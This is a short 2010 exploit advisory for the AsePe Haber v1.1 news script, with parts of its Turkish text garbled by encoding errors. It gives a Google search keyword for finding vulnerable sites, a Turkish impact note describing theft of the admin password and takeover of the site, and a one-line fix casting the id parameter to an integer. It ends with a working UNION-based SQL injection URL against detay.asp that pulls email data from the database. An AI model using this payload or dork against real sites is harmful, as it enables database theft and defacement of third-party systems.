asepehaber-sql.txt
Posted on 04 January 2010
< ------------------- header data start ------------------- > ################################################## ########### # Application Name : AsePe Haber v1.1 # Vulnerable Type : SQL Injection # Google Keyword : AsePe Haber v1.1 # Infection : Yönetici bilgileride dahil olmak üzere veritabanındaki tüm verilere eriÅŸim saÄŸlanabilir. Elde edilen Yönetici ÅŸifresi ile sisteme giriÅŸ yapılarak haber vb. içerik eklemek suretiyle ilgili site ana sayfası yönlendirilerek hack edilebilir. # Bug Fix Advice : id deÄŸiÅŸkeni sadece Integer deÄŸer alacak ÅŸekilde düzenlenmelidir. Ä°lgili Güvenlik açığının kapatılması için Örnek Kod: id = Cint(Request.QueryString(id)) # author : Bug Researchers ################################################## ########### < ------------------- header data end of ------------------- > < -- bug code start -- > target] /detay.asp?id=-1+union+select+0,email,2,3,4,5,6,7,8,9,10+from+hab er < -- bug code end of -- >
